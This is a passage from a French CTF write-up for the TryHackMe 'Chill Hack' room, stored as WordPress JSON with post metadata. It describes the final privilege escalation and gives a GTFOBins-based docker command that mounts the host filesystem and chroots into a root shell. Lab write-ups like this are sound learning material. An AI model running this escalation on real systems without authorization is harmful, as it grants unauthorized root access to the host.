class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"575\" height=\"73\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-12.png\" alt=\"\" class=\"wp-image-440\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-12.png 575w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-12-300x38.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-12-150x19.png 150w\" sizes=\"auto, (max-width: 575px) 100vw, 575px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous allons donc nous aider de <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/docker\/\" target=\"_blank\" rel=\"noreferrer noopener\">Gtfobins<\/a> !<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-13.png\" alt=\"\" class=\"wp-image-441\" width=\"665\" height=\"282\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-13.png 930w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-13-300x127.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-13-150x64.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-13-768x326.png 768w\" sizes=\"auto, (max-width: 665px) 100vw, 665px\" \/><\/figure><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">docker run -v \/:\/mnt --rm -it alpine chroot \/mnt sh<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"783\" height=\"176\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_19-1.png\" alt=\"\" class=\"wp-image-444\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_19-1.png 783w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_19-1-300x67.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_19-1-150x34.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_19-1-768x173.png 768w\" sizes=\"auto, (max-width: 783px) 100vw, 783px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Bingo ! Nous pouvons \u00e0 pr\u00e9sent r\u00e9cup\u00e9rer le dernier flag :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"438\" height=\"73\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_20-1.png\" alt=\"\" class=\"wp-image-445\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_20-1.png 438w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_20-1-300x50.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_20-1-150x25.png 150w\" sizes=\"auto, (max-width: 438px) 100vw, 438px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:43px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p><span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\"><\/span> <span class=\"rt-time\"> 4<\/span> <span class=\"rt-label rt-postfix\">min read<\/span><\/span>This room provides the real world pentesting challenges. <a href=\"https:\/\/mikadmin.fr\/blog\/tryhackme-chill-hack\/\" class=\"more-link\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":45,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[4],"tags":[25,27,26,28,22,63],"class_list":["post-404","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-infosec","tag-command-injection","tag-docker","tag-filter","tag-ftp","tag-tryhackme","tag-writeup"],"aioseo_notices":[],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/404","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/comments?post=404"}],"version-history":[{"count":0,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/404\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media\/45"}],"wp:attachment":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media?parent=404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/categories?post=404"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/tags?post=404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}